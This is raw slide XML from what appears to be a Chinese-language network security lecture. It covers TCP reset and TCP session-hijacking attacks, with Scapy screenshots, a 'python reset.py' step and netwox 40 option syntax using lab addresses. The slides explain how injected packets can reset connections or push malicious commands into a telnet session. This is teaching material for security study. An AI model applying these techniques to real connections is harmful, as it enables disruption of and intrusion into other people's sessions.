                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>以后，执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>python reset.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="646094125"/>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03B30C-964A-484D-A09D-A5EAA70CD7E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ACE924B-7F06-4002-A789-1E438552B3C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755575" y="1916832"/>
            <a:ext cx="7536221" cy="4032448"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AEBD635-D78D-45A3-8EDA-384FB3D798A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220072" y="2564904"/>
            <a:ext cx="1368152" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>old_ip.dst</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接箭头连接符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC60310-1FB1-4CC2-98CA-1133A5E4E05A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2699792" y="2780928"/>
            <a:ext cx="2376264" cy="64807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9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27EBAD1B-35B2-4570-A723-DBDB56006865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231660" y="2934236"/>
            <a:ext cx="1368152" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>old_ip.src</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直接箭头连接符 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8235D539-2B2F-438E-8679-3667D14C77EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2771800" y="3118902"/>
            <a:ext cx="2459860" cy="45411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2" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CCF6A42-8CDF-42B6-B135-6EDD9D0636FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004048" y="3553268"/>
            <a:ext cx="1368152" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接箭头连接符 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC05738-0231-4288-862E-CA264E50C19D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2915816" y="3697284"/>
            <a:ext cx="2045712" cy="21370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997838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righ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righ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right)">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080E31-FF17-4C34-9B3A-9E3FB295EEF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP Reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击截图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5AAC28-10FD-4373-995E-BA2C18A79015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1844823"/>
            <a:ext cx="7128792" cy="4296877"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2662574923"/>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TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话劫持攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>TCP会话劫持攻击的目的是通过向此会话中注入恶意内容来劫持两个受害者之间的现有TCP连接（会话）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果此连接是telnet会话，则攻击者可以将恶意命令（例如，删除重要文件）注入此会话，从而使受害者执行恶意命令。</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TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会话劫持原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214880" y="1610360"/>
            <a:ext cx="3839210" cy="4733290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>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2B0457-AB1B-4881-A6E9-3AB0CDFC7FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D061818-3BF9-49D4-8A40-2A8B02B80BDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>号攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 40 [-l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>] [-m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>] [-o port] [-p port] [-q uint32] [-B]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="304800" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-l|--ip4-src </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>             IP4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> {10.0.2.6}</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-m|--ip4-dst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>            IP4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> {5.6.7.8}</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-o|--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tcp-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> port           TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> {1234}</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-p|--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tcp-dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> port           TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> {80}</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-q|--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tcp-seqnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> uint32     TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>seqnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (rand if unset) {0}</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-H|--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
